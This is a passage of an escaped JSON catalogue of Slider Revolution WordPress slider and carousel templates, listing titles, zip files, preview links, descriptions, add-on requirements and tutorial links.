AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-scrollvideo-addon\\\\\\/revslider-scrollvideo-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Scroll Video AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"488\":{\"id\":\"533\",\"title\":\"Food Delivery Lottie Scroll\",\"alias\":\"food-delivery-lottie-scroll\",\"zip\":\"food-delivery-lottie-scroll.zip\",\"uid\":\"5dfbfac45c5df7702238ba1b43afe8f6\",\"img\":\"food-delivery-lottie-scroll\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/food-delivery-lottie-scroll\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=food-delivery-lottie-scroll\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Design DNA Scroll Video\\\" template is\\u00a0a striking, fullscreen hero module that is using our new Scroll Video addon.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-lottie-addon\\\\\\/revslider-lottie-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Lottie AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Design a Scroll Animation on Your Own Using Lottie [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-design-a-scroll-animation-on-your-own-using-lottie-tutorial\\/\",\"guide_img\":\"tutorial\\/food-delivery-lottie-scroll.png\",\"active\":\"1\",\"installed\":false},\"489\":{\"id\":\"534\",\"title\":\"Food Recipe Carousel Template\",\"alias\":\"food-recipe-carousel-template\",\"zip\":\"\",\"uid\":\"food-recipe-carousel-template\",\"img\":\"packages\\/food-recipe-carousel-template-package.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/food-recipe-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=food-recipe-carousel\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">Showcase your cooking recipes with the easy to use \\\"Food Recipe Carousel\\\" template. Clicking the titles opens up a detail view!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Food Recipe Carousel Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"42\",\"installed\":false},\"490\":{\"id\":\"535\",\"title\":\"Food Recipe Carousel\",\"alias\":\"food-recipe-carousel\",\"zip\":\"packs\\/food-recipe-carousel.zip\",\"uid\":\"6ba9695ba1a22a6e99f96431d8fb01e8\",\"img\":\"food-recipe-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/food-recipe-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=food-recipe-carousel\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Food Recipe Carousel Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"42\",\"installed\":false},\"491\":{\"id\":\"536\",\"title\":\"Food Recipe Modal\",\"alias\":\"food-recipe-modal\",\"zip\":\"packs\\/food-recipe-modal.zip\",\"uid\":\"1c5b2e959cd973efc5c1887a3a4279f3\",\"img\":\"food-recipe-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/food-recipe-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=food-recipe-carousel\",\"version\":\"1.0.0\",\"required\":\"6.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The \\\"Charity Non-Profit Website\\\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Food Recipe Carousel Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"42\",\"installed\":false},\"492\":{\"id\":\"537\",\"title\":\"Corporate Carousel Template\",\"alias\":\"corporate-carousel-template\",\"zip\":\"\",\"uid\":\"corporate-carousel-template\",\"img\":\"packages\\/corporate_carousel_bundle.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/corporate-carousel-with-lightbox?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=corporate-carousel-with-lightbox\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Carousel is a basic, easy to use carousel with tab navigation. The lightbox modal can show any additonal content, independant of the carousel.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"2021-01-19 15:14:10\",\"package\":\"Corporate Carousel Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"43\",\"installed\":false},\"493\":{\"id\":\"538\",\"title\":\"Corporate Carousel\",\"alias\":\"corporate-carousel\",\"zip\":\"packs\\/corporate-carousel.zip\",\"uid\":\"30dea0e333913cb5ebbf8dded8c3a839\",\"img\":\"corporate-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=revolution.themepunch.com\",\"version\":\"1.0.1\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Carousel is a basic, easy to use carousel with tab navigation. The lightbox modal can show any additonal content, independant of the carousel.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2021-01-19 15:26:51\",\"package\":\"Corporate Carousel Template\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"43\",\"installed\":false},\"494\":{\"id\":\"539\",\"title\":\"Corporate Lightbox\",\"alias\":\"corporate-lightbox\",\"zip\":\"packs\\/corporate-lightbox.zip\",\"uid\":\"832c277bfc5a288c0dffd784e4041265\",\"img\":\"corporate-lightbox\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=revolution.themepunch.com\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">The Corporate Carousel is a basic, easy to use carousel with tab navigation. The lightbox modal can show any additonal content, independant of the carousel.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-01-19 15:34:36\",\"package\":\"Corporate Carousel Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"43\",\"installed\":false},\"495\":{\"id\":\"540\",\"title\":\"Cyber Carousel Template\",\"alias\":\"cyber-carousel-template\",\"zip\":\"\",\"uid\":\"cyber-carousel-template\",\"img\":\"packages\\/cybercarousel_bundle.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/cyber-carousel-with-lightbox?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cyber-carousel-with-lightbox\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">This fullscreen carousel has easy to edit content and vertical navigation tabs. The highlight color can be changed with one click upon opening the editor.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"website\"],\"plugin_require\":null,\"date\":\"2021-01-19 15:40:25\",\"package\":\"Cyber Carousel Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Featured Content Section That Convinces Visitors to Keep Reading [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-featured-content-section-that-convinces-visitors-to-keep-reading\\/\",\"guide_img\":\"tutorial\\/Cyber-Carousel-With-Lightbox.png\",\"active\":\"1\",\"package_id\":\"44\",\"installed\":false},\"496\":{\"id\":\"541\",\"title\":\"Cyber Carousel\",\"alias\":\"cyber-carousel\",\"zip\":\"packs\\/cyber-carousel.zip\",\"uid\":\"b5ef41c7f498bd1dccf8224bfbade718\",\"img\":\"cyber-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/cyber-carousel-with-lightbox?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cyber-carousel-with-lightbox\",\"version\":\"1.0.1\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">This fullscreen carousel has easy to edit content and vertical navigation tabs. The highlight color can be changed with one click upon opening the editor.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2021-01-19 15:42:44\",\"package\":\"Cyber Carousel Template\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Featured Content Section That Convinces Visitors to Keep Reading [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-featured-content-section-that-convinces-visitors-to-keep-reading\\/\",\"guide_img\":\"tutorial\\/Cyber-Carousel-With-Lightbox.png\",\"active\":\"1\",\"package_id\":\"44\",\"installed\":false},\"497\":{\"id\":\"542\",\"title\":\"Cyber Carousel Lightbox\",\"alias\":\"cyber-carousel-lightbox\",\"zip\":\"packs\\/cyber-carousel-lightbox.zip\",\"uid\":\"cb91abeed0555dfcafe849c37e7c9c32\",\"img\":\"cyber-carousel-lightbox\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/cyber-carousel-with-lightbox?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cyber-carousel-with-lightbox\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">This fullscreen carousel has easy to edit content and vertical navigation tabs. The highlight color can be changed with one click upon opening the editor.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-01-19 15:50:15\",\"package\":\"Cyber Carousel Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Featured Content Section That Convinces Visitors to Keep Reading [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-featured-content-section-that-convinces-visitors-to-keep-reading\\/\",\"guide_img\":\"tutorial\\/Cyber-Carousel-With-Lightbox.png\",\"active\":\"1\",\"package_id\":\"44\",\"installed\":false},\"498\":{\"id\":\"543\",\"title\":\"Woo Carousel One\",\"alias\":\"woocommerce-carousel-one\",\"zip\":\"woocommerce-carousel-one.zip\",\"uid\":\"df0a99cef3981ecb608dff4ed573a493\",\"img\":\"woocommerce-carousel-one\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woocommerce-slider-pack\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-slider-pack\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A basic WooCommerce carousel. Just set your categories and the carousel will be populated with your WooCommerce products.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"2021-01-19 16:02:45\",\"package\":\"Woo Slider Pack\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"45\",\"installed\":false},\"499\":{\"id\":\"544\",\"title\":\"Woo Carousel One Static\",\"alias\":\"woocommerce-carousel-one-static\",\"zip\":\"woocommerce-carousel-one-static.zip\",\"uid\":\"5c955a3850369e79b1e18921306ac1df\",\"img\":\"woocommerce-carousel-one-static\\/slide1.jpg\",\"preview\":\"https:\\/\\/sliderrevolution.com\\/templates\\/woocommerce-slider-pack\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-slider-pack\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A static content carousel. Please use the \\\"non-static\\\" version for WooCommerce.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"2021-01-19 16:05:02\",\"package\":\"Woo Slider Pack Static\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"46\",\"installed\":false},\"500\":{\"id\":\"545\",\"title\":\"Woo Carousel Two\",\"alias\":\"woocommerce-carousel-two\",\"zip\":\"woocommerce-carousel-two.zip\",\"uid\":\"fdd797d8e98a9138f5563b68b95ebe1c\",\"img\":\"woocommerce-carousel-two\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woocommerce-slider-pack\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-slider-pack\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A basic WooCommerce carousel. Just set your categories and the carousel will be populated with your WooCommerce products.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"2021-01-19 16:06:57\",\"package\":\"Woo Slider Pack\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"45\",\"installed\":false},\"501\":{\"id\":\"546\",\"title\":\"Woo Carousel Two Static\",\"alias\":\"woocommerce-carousel-two-static\",\"zip\":\"woocommerce-carousel-two-static.zip\",\"uid\":\"2f3bfb1dfa99647426ce906f10dfc480\",\"img\":\"woocommerce-carousel-two-static\\/slide1.jpg\",\"preview\":\"https:\\/\\/sliderrevolution.com\\/templates\\/woocommerce-slider-pack\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-slider-pack\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A static content carousel. Please use the \\\"non-static\\\" version for WooCommerce.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"2021-01-19 16:16:15\",\"package\":\"Woo Slider Pack Static\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"46\",\"installed\":false},\"502\":{\"id\":\"547\",\"title\":\"Woo Feature Slider\",\"alias\":\"woocommerce-feature-slider\",\"zip\":\"woocommerce-feature-slider.zip\",\"uid\":\"c8aa1f551065eeffc752f2d8daef6db1\",\"img\":\"woocommerce-feature-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woocommerce-slider-pack\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-slider-pack\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A basic WooCommerce slider. Just set your categories and the slider will be populated with your WooCommerce products.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"2021-01-19 16:19:13\",\"package\":\"Woo Slider Pack\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"45\",\"installed\":false},\"503\":{\"id\":\"548\",\"title\":\"Woo Feature Slider Static\",\"alias\":\"woocommerce-feature-slider-static\",\"zip\":\"woocommerce-feature-slider-static.zip\",\"uid\":\"2f29e8fd101c799480152a7911b33ca6\",\"img\":\"woocommerce-feature-slider-static\\/slide1.jpg\",\"preview\":\"https:\\/\\/sliderrevolution.com\\/templates\\/woocommerce-slider-pack\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-slider-pack\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A static content slider Please use the \\\"non-static\\\" version for WooCommerce.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"2021-01-19 16:20:57\",\"package\":\"Woo Slider Pack Static\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"46\",\"installed\":false},\"504\":{\"id\":\"549\",\"title\":\"Woo Liquid Slider\",\"alias\":\"woo-liquid-slider\",\"zip\":\"woo-liquid-slider.zip\",\"uid\":\"9f455f73675a73dbefe820288e994f27\",\"img\":\"woo-liquid-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woocommerce-liquid-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-liquid-slider\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A WooCommerce slider using the BubbleMorph addon for an interesting liquid effect. Just set your categories and the slider will be populated with your WooCommerce products.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"postbased\",\"woocommerce\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-01-19 16:23:03\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Draw Attention to Your eCommerce Products with a Liquid Effect [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-draw-attention-to-your-ecommerce-products\\/\",\"guide_img\":\"tutorial\\/woo-liquid-slider.png\",\"active\":\"1\",\"installed\":false},\"505\":{\"id\":\"550\",\"title\":\"Woo Liquid Slider Static\",\"alias\":\"woocommerce-liquid-slider-static\",\"zip\":\"woocommerce-liquid-slider-static.zip\",\"uid\":\"5848192fea46ffee95a91aa531848e19\",\"img\":\"woocommerce-liquid-slider-static\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woocommerce-liquid-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-liquid-slider\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A static content slider using the BubbleMorph addon for an interesting liquid effect. For WooCommerce, please use the \\\"non-static\\\" version.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"woocommerce\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-01-19 16:24:35\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Draw Attention to Your eCommerce Products with a Liquid Effect [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-draw-attention-to-your-ecommerce-products\\/\",\"guide_img\":\"tutorial\\/woo-liquid-slider.png\",\"active\":\"1\",\"installed\":false},\"506\":{\"id\":\"551\",\"title\":\"Woo Slider Pack\",\"alias\":\"woo-slider-pack\",\"zip\":\"\",\"uid\":\"woo-slider-pack\",\"img\":\"packages\\/woosliderpack_dynamic.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woocommerce-slider-pack\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-slider-pack\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A basic WooCommerce slider. Just set your categories and the slider will be populated with your WooCommerce products.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\",\"slider\",\"postbased\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"2021-01-20 09:34:45\",\"package\":\"Woo Slider Pack\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"45\",\"installed\":false},\"507\":{\"id\":\"552\",\"title\":\"Woo Slider Pack Static\",\"alias\":\"woo-slider-pack-static\",\"zip\":\"\",\"uid\":\"woo-slider-pack-static\",\"img\":\"packages\\/woosliderpack_static.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woocommerce-slider-pack\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-slider-pack\",\"version\":\"1.0.0\",\"required\":\"6.3.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A basic WooCommerce slider. Just set your categories and the slider will be populated with your WooCommerce products.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"2021-01-20 09:39:21\",\"package\":\"Woo Slider Pack Static\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"46\",\"installed\":false},\"508\":{\"id\":\"553\",\"title\":\"Creative Hero Collection\",\"alias\":\"creative-hero-collection\",\"zip\":\"creative-hero-collection.zip\",\"uid\":\"e20126d93d081055e5ff3f6981b971fa\",\"img\":\"creative-hero-collection\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/creative-hero-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=creative-hero-collection\",\"version\":\"1.0.0\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A fantastic intro presentation for almost any website. If you want to use a single slide as a hero, simply drag it to the first position and set the layout of the module to \\\"scene\\\".<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-02-23 10:22:47\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Engaging Hero Section Without Any Photos or Videos [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-engaging-hero-section-without-any-photos-or-videos\\/\",\"guide_img\":\"tutorial\\/Creative-Hero-Collection.png\",\"active\":\"1\",\"installed\":false},\"509\":{\"id\":\"554\",\"title\":\"Photo Slider\",\"alias\":\"photographer-slider\",\"zip\":\"photographer-slider.zip\",\"uid\":\"e00104cff231e2aaeb149b3c63e78a5e\",\"img\":\"photographer-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/photographer-and-videographer-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=photographer-and-videographer-slider\",\"version\":\"1.0.0\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A great module for any photographer\\/videographer who wants to display their portfolio in an engaging way.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-02-23 10:25:31\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Customized Transition Effect for Your Hero Section [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-customized-transition-effect-for-your-hero-section\\/\",\"guide_img\":\"tutorial\\/photographer-slider.png\",\"active\":\"1\",\"installed\":false},\"510\":{\"id\":\"555\",\"title\":\"Real Estate Slider\",\"alias\":\"realestate-slider\",\"zip\":\"realestate-slider.zip\",\"uid\":\"596effabfef768f0371cba2b1fdd0c1d\",\"img\":\"realestate-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/real-estate-showcase-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=real-estate-showcase-slider\",\"version\":\"1.0.0\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Showcase your clients real estate offerings with this clean and convincing presentation.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-02-23 10:45:36\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Stunning Hero Slider for Your Real 